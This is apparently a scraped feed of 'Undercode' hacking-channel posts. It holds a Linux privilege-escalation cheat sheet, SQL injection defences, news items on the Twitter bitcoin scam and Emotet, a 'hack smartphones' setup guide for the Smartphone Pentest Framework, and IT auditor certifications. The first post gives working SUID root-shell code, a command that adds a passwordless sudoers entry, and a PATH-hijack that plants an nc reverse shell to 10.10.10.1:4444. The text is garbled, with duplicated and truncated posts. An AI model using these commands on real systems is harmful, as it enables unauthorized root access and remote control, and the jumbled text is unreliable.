β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Local Privilege Escalation #Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\
1) SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2) SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
4) Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
>
to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
Enjoy β€οΈππ»
β git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Local Privilege Escalation #Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\
1) SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2) SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
4) Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
>
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
6) You may find a command is being executed by the root user, you may be able to modify the system PATH environment variableto execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
Enjoy β€οΈππ»
β git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Vulnerability solution
SQL injection vulnerability solutions:
1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration
2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.
5. The data length should be strictly regulated, which can prevent the relatively long SQL injection statement from being executed correctly to a certain extent.
6. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding. Inconsistent upper and lower encoding may cause some filtering models to be bypassed.
7. Strictly restrict the operation authority of the website user's database, and provide this user with authority that can only satisfy his work, thereby minimizing the harm of injection attacks to the database.
8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Vulnerability solution
SQL injection vulnerability solutions:
1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration
2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.
The special characters ('"\<>&*; etc.) entering the database are escaped or coded.
4. Confirm the type of each data. For example, numeric data must be numeric, and the storage field in the database must correspond to int type.5. The data length should be strictly regulated, which can prevent the relatively long SQL injection statement from being executed correctly to a certain extent.
6. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding. Inconsistent upper and lower encoding may cause some filtering models to be bypassed.
7. Strictly restrict the operation authority of the website user's database, and provide this user with authority that can only satisfy his work, thereby minimizing the harm of injection attacks to the database.
8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Coinbase said it prevented more than 1,100 customers from trading with Twitter hackers
#news
> According to foreign media reports, cryptocurrency trading company Coinbase said that it recently prevented more than 1,100 customers from sending bitcoin to Twitter hackers. Last week, these hackers hijacked some well-known accounts to promote a Bitcoin scam. Philip Martin, Coinbase's chief information security officer, told Forbes that if Coinbase does not take this measure, these customers will send a total of 30.4 bitcoins (currently worth about $278,000) to hackers.
> It is worth noting that this amount is more than twice the actual amount ($121,000) collected by the hacker through the victim.
> Martin stated that despite Coinbaseβs actions, 14 of its customers were still victims of the scam, and they sent hackers about $3,000 worth of Bitcoin before their addresses were blacklisted.
> The report shows that users of Gemini, Kraken and Binance have also tried to send bitcoin to these addresses, but the amount is not as large as Coinbase. All these exchanges acted immediately after the scam was exposed and blocked these addresses.
> It is reported that this widespread attack took place on Twitter on Wednesday local time in the United States. The celebrities affected include former US President Barack Obama, Microsoft co-founder Bill Gates and Tesla CEO Elon Musk. Wait.
> The blockchain analysis company claims that some stolen bitcoins have been transferred to some exchanges and mixed bitcoin merchants such as Wasabi Wallet.
> Tom Robinson, co-founder and chief scientist of Elliptic, told The Block: βWe can see a very small amount of data flowing to a known, regulated encrypted exchange system.β However, for confidentiality reasons, he refused to disclose the name of the exchange. But Robinson further stated that 2.89 bitcoin (22% of the total amount) was sent to the mustard wallet.
> Another blockchain analysis company, Whitestream, told The Block that the address of one of the hackers had already conducted transactions with at least three cryptocurrency platforms. Itsik Levy, Co-founder and CEO of Whitestream, told The Block: "We can see that an address is connected to addresses related to several digital currency payment processors (CoinPayments, Coinbase, BitPay)."
> In fact, a BitPay spokesperson confirmed to The Block that in May 2020, one of its merchants remitted $25 from a Twitter hackerβs address, and as part of BitPayβs standard processes and procedures, they are remittances. The detailed information obtained risks to related parties including law enforcement agencies.
CoinPayments declined to comment on this matter, and Coinbase did not respond to a request for comment.
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Coinbase said it prevented more than 1,100 customers from trading with Twitter hackers
#news
> According to foreign media reports, cryptocurrency trading company Coinbase said that it recently prevented more than 1,100 customers from sending bitcoin to Twitter hackers. Last week, these hackers hijacked some well-known accounts to promote a Bitcoin scam. Philip Martin, Coinbase's chief information security officer, told Forbes that if Coinbase does not take this measure, these customers will send a total of 30.4 bitcoins (currently worth about $278,000) to hackers.
> It is worth noting that this amount is more than twice the actual amount ($121,000) collected by the hacker through the victim.
> Martin stated that despite Coinbaseβs actions, 14 of its customers were still victims of the scam, and they sent hackers about $3,000 worth of Bitcoin before their addresses were blacklisted.
> The report shows that users of Gemini, Kraken and Binance have also tried to send bitcoin to these addresses, but the amount is not as large as Coinbase. All these exchanges acted immediately after the scam was exposed and blocked these addresses.
> It is reported that this widespread attack took place on Twitter on Wednesday local time in the United States. The celebrities affected include former US President Barack Obama, Microsoft co-founder Bill Gates and Tesla CEO Elon Musk. Wait.
> The blockchain analysis company claims that some stolen bitcoins have been transferred to some exchanges and mixed bitcoin merchants such as Wasabi Wallet.
> Tom Robinson, co-founder and chief scientist of Elliptic, told The Block: βWe can see a very small amount of data flowing to a known, regulated encrypted exchange system.β However, for confidentiality reasons, he refused to disclose the name of the exchange. But Robinson further stated that 2.89 bitcoin (22% of the total amount) was sent to the mustard wallet.
> Another blockchain analysis company, Whitestream, told The Block that the address of one of the hackers had already conducted transactions with at least three cryptocurrency platforms. Itsik Levy, Co-founder and CEO of Whitestream, told The Block: "We can see that an address is connected to addresses related to several digital currency payment processors (CoinPayments, Coinbase, BitPay)."
> In fact, a BitPay spokesperson confirmed to The Block that in May 2020, one of its merchants remitted $25 from a Twitter hackerβs address, and as part of BitPayβs standard processes and procedures, they are remittances. The detailed information obtained risks to related parties including law enforcement agencies.
CoinPayments declined to comment on this matter, and Coinbase did not respond to a request for comment.
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hacking a smartphone using Kali-for beginers by undercode :
> Kali is a Linux flavored program used by hackers and security professionals. A very popular and irreplaceable item. I will not describe the pros and cons, but let's get down to business:
Step 1: Open Terminal
Of course, to get started, fire up Kali and open a terminal.
Step 2: Install the required libraries
To run these Android virtual devices on 64-bit Debian operating systems (such as Kali), we need to install a few key libraries that are not included by default. Fortunately, they are all in the Kali repository.
kali> apt-get install lib32stdc ++ 6 lib32ncurses5 lib32zl
Installing these three libraries is enough to get us going, we can now start installing the Android Software Developer Kit (SDK).
Step 3: Install Android SDK
From yo ur browser go to the "Android SDK" website and download the Android SDK installer. Make sure you download the Linux kit. You can download and install the Windows or Mac options and then test these virtual devices in Kali, but this will be a more complex option. Let's go the easy way and set everything in Kali.
π¦Hacking a smartphone using Kali-for beginers by undercode :
> Kali is a Linux flavored program used by hackers and security professionals. A very popular and irreplaceable item. I will not describe the pros and cons, but let's get down to business:
Step 1: Open Terminal
Of course, to get started, fire up Kali and open a terminal.
Step 2: Install the required libraries
To run these Android virtual devices on 64-bit Debian operating systems (such as Kali), we need to install a few key libraries that are not included by default. Fortunately, they are all in the Kali repository.
kali> apt-get install lib32stdc ++ 6 lib32ncurses5 lib32zl
Installing these three libraries is enough to get us going, we can now start installing the Android Software Developer Kit (SDK).
Step 3: Install Android SDK
From yo ur browser go to the "Android SDK" website and download the Android SDK installer. Make sure you download the Linux kit. You can download and install the Windows or Mac options and then test these virtual devices in Kali, but this will be a more complex option. Let's go the easy way and set everything in Kali.
Forwarded from WEB UNDERCODE - PRIVATE
Once you've downloaded it, you can extract it using Kali's GUI archiving tool, or using the command line.
Extracting the Cali GUI
Step 4: Go to the tools directory
Next, we need to navigate to the tools directory of the SDK directory.
kali> cd / android-pentest-framework / sdk / tools
SDK tools
Once we are in the tools directory, we can launch the Android application. Just enter
kali> / android
Kali Androyd Installation
When you do this, the SDK manager will open the GUI as above. We will now download two versions of the Android operating system to practice our smartphone hacking, Android 4.3 and Android 2.2. Make sure you find them among this list, click on the box next to them, and click on the "install XX packages" button. This will force the SDK to load these operating systems into your Kali.
Step 5: Android Virtual Device Manager
After we have downloaded all the packages, we now need to build our Android virtual devices, or AVDs. From the SDK manager pictured above, select Tools -> Manage AVDs which will open an interface like below from Android Virtual Device Manager.
> Click on the "Create" button, which will open such an interface below. Create two Android virtual devices, one for Android 4.3 and one for Android 2.2. I just named my devices "Android 4.3" and "Android 2.2" and I recommend that you do the same.
> Create a virtual android device
Select a Nexus 4 device and the corresponding target (API 18 for Android 4.3 and API 8 for Android 2.2) and "Skin with dynamic hardware controls." You should leave the rest of the settings at their default values, with the exception of adding a 100 MiB SD card.
Step 6: launching the Android virtual device
After creating two Android virtual devices, the Android Virtual Device Manager should look like two devices.
This will launch the Android emulator creating your Android virtual device. Please be patient this may take a while. When he's finished, you should be greeted by a virtual smartphone on your Kali desktop!
Step 7: Install the Pentest Framwork smartphone
The next step is to install Smartphone Pentest Framework. You can use git clone to download it to
kali> git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git
π¦Installing Smartphone Pentest Framework
Step 8: Starting Apache
As you need a web server and MySQL database, go ahead and start both of these services
kali> service apache2 startkali> service mysql start
Step 9: change the configuration.
Like almost all Linux applications, Smartphone Pentest Framework is configured using a text configuration file. First you need to go to the directory with the framework console subdirectory
kali> CD / root / Smartphone-Pentest-Framework / frameworkconsole
Then open the config file in any text editor. In this case, I used Leafpad
kali> leafpad config
> We will need to edit the IPADDRESS variable and SHELLIPADDRESS variable to reflect the actual IP address of your Kali system (you can find it by entering "ifconfig").
Step 10: Launch the platform
We are now ready to launch the Smartphone Pentest Framework. Just enter
kali> ./framework.py
And that should open the Framework menu as shown below.
Finish! We are now ready to start hacking smartphones!
enjoyβ€οΈππ»
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Extracting the Cali GUI
Step 4: Go to the tools directory
Next, we need to navigate to the tools directory of the SDK directory.
kali> cd / android-pentest-framework / sdk / tools
SDK tools
Once we are in the tools directory, we can launch the Android application. Just enter
kali> / android
Kali Androyd Installation
When you do this, the SDK manager will open the GUI as above. We will now download two versions of the Android operating system to practice our smartphone hacking, Android 4.3 and Android 2.2. Make sure you find them among this list, click on the box next to them, and click on the "install XX packages" button. This will force the SDK to load these operating systems into your Kali.
Step 5: Android Virtual Device Manager
After we have downloaded all the packages, we now need to build our Android virtual devices, or AVDs. From the SDK manager pictured above, select Tools -> Manage AVDs which will open an interface like below from Android Virtual Device Manager.
> Click on the "Create" button, which will open such an interface below. Create two Android virtual devices, one for Android 4.3 and one for Android 2.2. I just named my devices "Android 4.3" and "Android 2.2" and I recommend that you do the same.
> Create a virtual android device
Select a Nexus 4 device and the corresponding target (API 18 for Android 4.3 and API 8 for Android 2.2) and "Skin with dynamic hardware controls." You should leave the rest of the settings at their default values, with the exception of adding a 100 MiB SD card.
Step 6: launching the Android virtual device
After creating two Android virtual devices, the Android Virtual Device Manager should look like two devices.
This will launch the Android emulator creating your Android virtual device. Please be patient this may take a while. When he's finished, you should be greeted by a virtual smartphone on your Kali desktop!
Step 7: Install the Pentest Framwork smartphone
The next step is to install Smartphone Pentest Framework. You can use git clone to download it to
kali> git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git
π¦Installing Smartphone Pentest Framework
Step 8: Starting Apache
As you need a web server and MySQL database, go ahead and start both of these services
kali> service apache2 startkali> service mysql start
Step 9: change the configuration.
Like almost all Linux applications, Smartphone Pentest Framework is configured using a text configuration file. First you need to go to the directory with the framework console subdirectory
kali> CD / root / Smartphone-Pentest-Framework / frameworkconsole
Then open the config file in any text editor. In this case, I used Leafpad
kali> leafpad config
> We will need to edit the IPADDRESS variable and SHELLIPADDRESS variable to reflect the actual IP address of your Kali system (you can find it by entering "ifconfig").
Step 10: Launch the platform
We are now ready to launch the Smartphone Pentest Framework. Just enter
kali> ./framework.py
And that should open the Framework menu as shown below.
Finish! We are now ready to start hacking smartphones!
enjoyβ€οΈππ»
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - georgiaw/Smartphone-Pentest-Framework: Repository for the Smartphone Pentest Framework (SPF)
Repository for the Smartphone Pentest Framework (SPF) - georgiaw/Smartphone-Pentest-Framework
Forwarded from WEB UNDERCODE - PRIVATE
Hacking a smart phone steps by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Microsoft warns: large-scale Emotet is making a comeback, this time the target is banking information
According to foreign media reports, Microsoft has issued a warning a few days ago that a large-scale malware campaign is targeting end usersβ bank information. Microsoft pointed out that as part of a new campaign to use Emoter malware, a large number of emails with hundreds of unique attachments were sent to users. It is understood that the Emotet banking Trojan was first discovered by security researchers in 2014.
π¦Microsoft warns: large-scale Emotet is making a comeback, this time the target is banking information
According to foreign media reports, Microsoft has issued a warning a few days ago that a large-scale malware campaign is targeting end usersβ bank information. Microsoft pointed out that as part of a new campaign to use Emoter malware, a large number of emails with hundreds of unique attachments were sent to users. It is understood that the Emotet banking Trojan was first discovered by security researchers in 2014.
> Emotet was originally designed as a bank malware that tried to sneak into users' computers and steal their sensitive and private information. The latest version of the software also adds spam and malware delivery services, including other banking Trojans.
Microsoft pointed out in the report that the phishing activity has been silent for several months, but recently it has made a comeback. The new campaign uses a long-term Emotet strategy: an email with a link or a file with a highly confusing malicious macro runs a PowerShell script to download the payload through 5 download links. The download URL usually points to the attacked website, which is exactly what Emotet does.
The features used by Emotet can help software avoid detection from some anti-malware products. Emotet uses worm-like features to help it spread to other connected computers, which helps the spread of malware. This feature led the US Department of Homeland Security to conclude that Emotet is one of the most expensive and destructive malware. It affects governments, private sectors, individuals and organizations, and each cleanup costs more than $1 million
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Microsoft pointed out in the report that the phishing activity has been silent for several months, but recently it has made a comeback. The new campaign uses a long-term Emotet strategy: an email with a link or a file with a highly confusing malicious macro runs a PowerShell script to download the payload through 5 download links. The download URL usually points to the attacked website, which is exactly what Emotet does.
The features used by Emotet can help software avoid detection from some anti-malware products. Emotet uses worm-like features to help it spread to other connected computers, which helps the spread of malware. This feature led the US Department of Homeland Security to conclude that Emotet is one of the most expensive and destructive malware. It affects governments, private sectors, individuals and organizations, and each cleanup costs more than $1 million
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What certifications are required to become an IT auditor?
There are other certifications that will help you to become an IT auditor or go even further in the field of compliance and security if you are already working in a similar role. Below are some of the most popular certifications that you can take if you are wanting to get into the field of IT auditing:
1) IIAβs CIA: The Certified Internal Auditor certification is a good starting point for anyone that wants to get into an auditing role. This is not specifically aimed at IT auditing, but it does teach best practice and governance standards which are important for any auditor. These skills are useful when auditing in general and can be applied to IT systems
2) ISACAβs CISA: The Certified Information Systems Auditor is aimed at IT auditing and teaches many of the basics that you will need to get into a role as an IT auditor. It teaches change controls and security standards that are most used for auditing IT systems
3) ISACAβs CGEIT: This certification is aimed at more managerial candidates that act in an advisory or assurance capacity as they relate to IT governance. This covers some auditing but is looked at as a more overarching certification for more senior roles within the organization
4) ISACAβs CRISC: The CRISC certification (Certified Risk and Information Systems Control) teaches candidates how to evaluate and assess the current risk management and mitigation systems within an organization. IT systems audits are a big part of this process, although this certification will certainly teach you much more than that
SOURCE WIKI
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What certifications are required to become an IT auditor?
There are other certifications that will help you to become an IT auditor or go even further in the field of compliance and security if you are already working in a similar role. Below are some of the most popular certifications that you can take if you are wanting to get into the field of IT auditing:
1) IIAβs CIA: The Certified Internal Auditor certification is a good starting point for anyone that wants to get into an auditing role. This is not specifically aimed at IT auditing, but it does teach best practice and governance standards which are important for any auditor. These skills are useful when auditing in general and can be applied to IT systems
2) ISACAβs CISA: The Certified Information Systems Auditor is aimed at IT auditing and teaches many of the basics that you will need to get into a role as an IT auditor. It teaches change controls and security standards that are most used for auditing IT systems
3) ISACAβs CGEIT: This certification is aimed at more managerial candidates that act in an advisory or assurance capacity as they relate to IT governance. This covers some auditing but is looked at as a more overarching certification for more senior roles within the organization
4) ISACAβs CRISC: The CRISC certification (Certified Risk and Information Systems Control) teaches candidates how to evaluate and assess the current risk management and mitigation systems within an organization. IT systems audits are a big part of this process, although this certification will certainly teach you much more than that
SOURCE WIKI
β β β Uππ»βΊπ«Δπ¬πβ β β β